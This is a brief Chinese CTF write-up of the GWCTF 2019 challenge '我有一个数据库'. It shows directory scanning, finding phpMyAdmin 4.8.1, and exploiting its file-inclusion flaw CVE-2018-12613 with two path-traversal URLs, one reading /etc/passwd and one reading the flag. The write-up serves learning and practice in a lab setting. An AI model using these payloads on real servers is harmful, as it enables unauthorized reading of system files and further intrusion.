[GWCTF 2019]我有一个数据库

双层小牛堡2023-09-12 23:45

过来毛都没有

直接dirsearch 扫一下

发现存在 phpadmin 我们直接访问一下

啥都没有 但是给我们了 phpadmin的版本

我们去搜搜看是否存在漏洞

phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin cve-2018-12613漏洞获取webshell_zhang三的博客-CSDN博客

发现还真有 我们直接复现即可

复制代码 
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
复制代码 
phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
相关推荐
蓝队云计算2 小时前
深耕本土,安全稳定——云南云服务器为何首推蓝队云
运维·服务器·安全·云服务器·蓝队云
Thomas.Sir3 小时前
Shiro认证与授权:Java安全框架的核心机制
java·安全·shiro·权限控制
北京软秦科技有限公司3 小时前
AI报告文档审核守护医疗安全:IACheck助力口腔器械消毒检测报告全面合规
大数据·人工智能·安全
上海云盾安全满满4 小时前
什么是渗透测试,渗透测试在系统安全方面起什么作用
安全·系统安全
志栋智能4 小时前
预算有限?超自动化安全运维的普惠解决方案
运维·网络·人工智能·安全·自动化
oi..4 小时前
Flag入门—修改数据包拿到答案
笔记·测试工具·安全·网络安全
kang0x04 小时前
Wire - Writeup by AI
安全
陈天伟教授6 小时前
人工智能应用- AI 增强显微镜:01.显微镜的瓶颈
前端·人工智能·安全·xss·csrf
科普体验馆6 小时前
《【VR安全体验馆】深度测评:优质服务商与推荐厂家全景解析》
安全·vr
星幻元宇VR6 小时前
VR生产安全学习机|将安全教育带入沉浸式实训新时代
科技·学习·安全·vr·虚拟现实
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南032026年3月AI领域大事件:DeepSeek引领开源风暴04围棋-html版本05班级宠物园部署指南06小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)07UV安装并设置国内源08OpenClaw 使用和管理 MCP 完全指南09“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)10OpenClaw Control UI安全上下文访问配置